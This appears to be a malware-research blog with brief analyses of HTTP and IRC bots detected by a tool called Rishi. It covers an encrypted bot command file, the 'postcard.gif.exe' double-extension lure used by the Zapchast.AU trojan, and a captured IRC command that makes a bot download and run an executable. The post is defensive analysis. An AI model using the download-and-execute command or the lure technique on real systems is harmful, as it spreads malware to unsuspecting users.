Virus Blog

We are currently monitoring a number of infected machines, which receive their remote commands via the HTTP protocol. Our bot detection tool Rishi is able to detect so called HTTP bots, which in contrast to IRC bots use websites to distribute commands. An infected machine frequently contacts a special webserver to retrieve a file called "text.dat", which contains further instructions to perform. However, these files seem to be encrypted, so we do not yet know what the bots are supposed to do. Following is an extract of one of those files:

eoeve-115jj,2$+16 $7&-k+ 1j,("j&(!k5-5HOHOeoewupete-115jj)k( ??,&*! &k+ 1j$qtwj! k5-5z'x'7$+!▒HOeoewttete-115jj)k( ??,&*! &k+ 1j$qtwj=5k5-5z'x'7$+!▒HOeoewtqete-115jj)k( ??,&*! &k+ 1j$qtwj$+tk5-5z'x'7$+!▒HOeoewtpete-115jj)k( ??,&*! &k+ 1j$qtwj55k5-5z'x'7$+!▒HOeoewtsete-115jj)k( ??,&*! &k+ 1j$qtwj7(k5-5z(x(*! (▒c'x'7$+!▒HOeoewtrete-115jj)k( ??,&*! &k+ 1j$qtwj63k5-5z(x(*! (▒c'x'7$+!▒HOeoewt}ete-115jj)k( ??,&*! &k+ 1j$qtwj17k5-5z(x(*! (▒c'x'7$+!▒HOeoewwtete-115jj)k( ??,&*! &k+ 1j$qtwj(&k5-5z(x(*! (▒c'x'7$+!▒HOeoewwwete-115jj)k( ??,&*! &k+ 1j$qtwj

I have written a short analysis of the trojan Zapchast.AU, which can be downloaded here.

"The trojan Zapchast.AU is distributed by email, but not as
a file attachment. The mail contains a message about a
greeting card which is waiting for the recipient to be downloaded.
Embedded in the message is a hyper link leading
to a suspicious file named postcard.gif.exe. As Microsoft
Windows file manager by default hides known extensions
like .exe the file appears on the hard disk as
postcard.gif..."

Thanx to our Bot-Detection software called Rishi we managed to get our hands on some new binaries of the BDS/SpamBot.Gen. This particular bot utilizes an IRC based command and control server, but does not connect to any channel to receive its commands. Instructions are transmitted via private messages like this:

PRIVMSG jejb-1_9910_1528 :exec http://xxx.xxx.xxx.xxx/up/hdda.2.exe?jejb-1_9910_1528 hdda.2.exe 777